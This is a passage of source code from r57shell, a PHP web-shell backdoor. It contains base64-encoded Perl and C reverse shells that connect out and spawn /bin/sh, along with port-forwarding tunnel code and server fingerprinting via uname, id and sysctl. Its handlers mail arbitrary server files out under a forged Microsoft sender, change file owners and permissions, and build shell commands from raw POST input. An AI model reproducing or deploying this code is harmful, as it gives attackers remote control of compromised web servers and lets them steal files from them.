1485 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1486 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1487 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1488 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1489 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1490 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1491 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1492 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1493 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1494 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1495 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1496 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1497 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1498 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1499 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1500 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1501 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1502 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1503 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1504 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1505 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1506 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1507 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1508 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1509 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1510 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1511 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1512 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1513 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1514 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1515 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1516 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1517 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1518 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1519 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1520 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1521 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1522 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1523 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1524 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1525 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1526 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1527 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1528 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1529 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1530 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1531 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1532 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1533 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1534 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1535 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1536 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1537 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1538 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1539 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1540 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1541 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1542 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1543 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1544 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1545 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1546 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1547 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1548 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1549 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1550 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1551 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1552 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1553 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1554 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1555 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1556 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1557 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1558 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1559 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1560 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1561 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1562 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1563 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1564 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1565 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1566 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1567 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1568 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1569 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1570 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1571 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1572 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1573 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1574 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1575 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1576 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1577 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1578 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1579 ybmV0LS0+";
1580 echo $head;
1581 echo '</head>';
1582 if(empty($_POST['cmd'])) {
1583 $serv = array(127,192,172,10);
1584 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
1585 $current_version = str_replace('.','',$version);
1586 if (!in_array($addr[0], $serv)) {
1587 @print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1588 @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}
1589 echo '<body bgcolor="#396D95"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1590 <tr><td bgcolor=#396D95 width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
1591 </b></font><b>'.ws(2).'r57shell '.$version.'</b>
1592 </font></td><td bgcolor=#396D95><font face=Verdana size=-2>';
1593 echo ws(2);
1594 echo "<b>".date ("d-m-Y H:i:s")."</b>";
1595 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1596 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1597 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1598 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1599 if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
1600 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1601 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1602 echo ws(2);
1603 echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode: <b><font color=orange>OFF</font></b>"));
1604 echo ws(2);
1605 echo "PHP version: <b>".@phpversion()."</b>";
1606 $curl_on = @function_exists('curl_version');
1607 echo ws(2);
1608 echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font color=orange>OFF</font></b>"));
1609 echo ws(2);
1610 echo "MySQL: <b>";
1611 $mysql_on = @function_exists('mysql_connect');
1612 if($mysql_on){
1613 echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</font></b>"; }
1614 echo ws(2);
1615 echo "MSSQL: <b>";
1616 $mssql_on = @function_exists('mssql_connect');
1617 if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1618 echo ws(2);
1619 echo "PostgreSQL: <b>";
1620 $pg_on = @function_exists('pg_connect');
1621 if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1622 echo ws(2);
1623 echo "Oracle: <b>";
1624 $ora_on = @function_exists('ocilogon');
1625 if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1626 echo "<br>".ws(2);
1627 echo "Kapal&#305; Funtionslar : <b>";
1628 if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";}
1629 $free = @diskfreespace($dir);
1630 if (!$free) {$free = 0;}
1631 $all = @disk_total_space($dir);
1632 if (!$all) {$all = 0;}
1633 $used = $all-$free;
1634 $used_percent = @round(100/($all/$free),2);
1635 echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
1636 echo '</font></td></tr><table>
1637 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1638 <tr><td align=right width=100>';
1639 echo $font;
1640 if(!$windows){
1641 echo '<font color=#BF0F0F><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1642 echo "</td><td>";
1643 echo "<font face=Verdana size=-2 color=orange><b>";
1644 $uname = ex('uname -a');
1645 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1646 if(!$safe_mode){
1647 $bsd1 = ex('sysctl -n kern.ostype');
1648 $bsd2 = ex('sysctl -n kern.osrelease');
1649 $lin1 = ex('sysctl -n kernel.ostype');
1650 $lin2 = ex('sysctl -n kernel.osrelease');
1651 }
1652 if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1653 else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1654 else { $sysctl = "-"; }
1655 echo ws(3).$sysctl."<br>";
1656 echo ws(3).ex('echo $OSTYPE')."<br>";
1657 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1658 $id = ex('id');
1659 echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1660 echo ws(3).$dir;
1661 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1662 echo "</b></font>";
1663 }
1664 else
1665 {
1666 echo '<font color=#BF0F0F><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1667 echo "</td><td>";
1668 echo "<font face=Verdana size=-2 color=orange><b>";
1669 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1670 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1671 echo ws(3).@get_current_user()."<br>";
1672 echo ws(3).$dir;
1673 echo "<br></font>";
1674 }
1675 echo "</font>";
1676 echo "</td></tr></table>";
1677 if(empty($c1)||empty($c2)) { die(); }
1678 $f = '<br>';
1679 $f .= base64_decode($c1);
1680 $f .= base64_decode($c2);
1681 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
1682  {
1683  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
1684  mr($language,$res);
1685  $_POST['cmd']="";
1686  }
1687 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1688  {
1689  if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
1690  else
1691   {
1692     $filename = @basename($_POST['loc_file']);
1693     $filedump = @fread($file,@filesize($_POST['loc_file']));
1694     fclose($file);
1695     $content_encoding=$mime_type='';
1696     compress($filename,$filedump,$_POST['compress']);
1697     $attach = array(
1698                     "name"=>$filename,
1699                     "type"=>$mime_type,
1700                     "content"=>$filedump
1701                    );
1702     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1703     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1704     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1705     mr($language,$res);
1706     $_POST['cmd']="";
1707   }
1708  }
1709 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1710 {
1711 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1712 }
1713 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1714  {
1715  switch($_POST['what'])
1716    {
1717    case 'own':
1718    @chown($_POST['param1'],$_POST['param2']);
1719    break;
1720    case 'grp':
1721    @chgrp($_POST['param1'],$_POST['param2']);
1722    break;
1723    case 'mod':
1724    @chmod($_POST['param1'],intval($_POST['param2'], 8));
1725    break;
1726    }
1727  $_POST['cmd']="";
1728  }
1729 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1730  {
1731    switch($_POST['what'])
1732    {
1733      case 'file':
1734       if($_POST['action'] == "create")
1735        {
1736        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1737        else {
1738         fclose($file);
1739         $_POST['e_name'] = $_POST['mk_name'];
1740         $_POST['cmd']="edit_file";
1741         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1742         }
1743        }
1744        else if($_POST['action'] == "delete")
1745        {
1746        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1747        $_POST['cmd']="";
1748        }
1749      break;
1750      case 'dir':
1751       if($_POST['action'] == "create"){
1752       if(mkdir($_POST['mk_name']))
1753        {
1754          $_POST['cmd']="";
